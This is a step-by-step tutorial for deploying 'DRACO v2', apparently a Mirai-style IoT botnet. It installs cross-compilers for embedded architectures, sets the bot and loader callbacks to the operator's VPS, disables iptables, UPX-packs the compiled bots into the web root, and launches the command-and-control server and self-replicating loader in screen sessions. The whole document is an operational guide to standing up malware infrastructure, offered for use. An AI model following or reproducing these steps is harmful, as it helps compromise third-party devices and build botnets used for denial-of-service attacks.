#=============================================#

WELCOME TO "DRACO v2" tutorial:
·▄▄▄▄  ▄▄▄   ▄▄▄·  ▄▄·       
██· ██ ▀▄ █·▐█ ▀█ ▐█ ▌▪ ▄█▀▄ 
▐█▪ ▐█▌▐▀▀▄ ▄█▀▀█ ██ ▄▄▐█▌.▐▌
██. ██ ▐█•█▌▐█▪ ▐▌▐███▌▐█▌.▐▌
▀▀▀▀▀• .▀  ▀ ▀  ▀ ·▀▀▀  ▀█▄▀▪

#=============================================#

[1] ︻╦╤─ COPY AND PASTE ALL OF THESE COMMANDS INTO UR VPS

================START BELOW THIS LINE================
yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y
yum clean all

mkdir /etc/xcompile
cd /etc/xcompile 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2

tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
rm -rf *.tar.bz2
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l

cd /tmp
wget https://dl.google.com/go/go1.9.4.linux-amd64.tar.gz -q
tar -xzf go1.9.4.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/
================STOP HERE================

[2] ︻╦╤─ Change IPs to your VPS IP IN

/bot/main.c
/dlr/main.c
/loader/src/main.c
/loader/src/headers/config.h
/tools/scanlisten.go

[3] ︻╦╤─ Copy These Commands To Your VPS                         

iptables -F; service iptables stop
service httpd restart

[4] ︻╦╤─ Compile the bot. Copy these commands to your VPS. Warnings are normal, Errors are bad.

cd ~/
chmod 777 * -R
sh construct.sh

[5]︻╦╤─ UPX pack. Copy these to your VPS

chmod +x upx
./upx --ultra-brute /var/www/html/SBIDIOT/*

[6] ︻╦╤─ Edit typesizes.h

nano /usr/include/bits/typesizes.h

THIS WILL BRING UP A TEXT DOCUMENT YOU CAN EDIT

Scroll down using the arrow keys and replace 1024 with 999999
Save with CTRL+X, Y, ENTER.


[7] ︻╦╤─ Increase ulimit

ulimit -n 999999; ulimit -u 999999; ulimit -e 999999

[8] ︻╦╤─ Screen the CNC and selfrep. Copy these commmands one by one.

cd cnc

screen ./cnc 6969 850 PORT <----------------- Replace with whatever port you want

#PRESS CONTROL + A + D to exit screen

cd

cd loader

screen ./rep

#PRESS CONTROL + A + D to exit screen

CONGRATULATIONS YOU HAVE SET UP DRACO. CONNECT VIA PUTTY USING CONNECTION TYPE RAW, HOSTNAME = VPS IP, PORT = WHATEVER PORT YOU PUT
MAKE SURE TO EDIT THE LOGIN.TXT WITH YOUR USERNAME AND PASSWORD. THE PASSWORD MUST BE LONGER THAN THE USERNAME.

Format for login.txt:

username password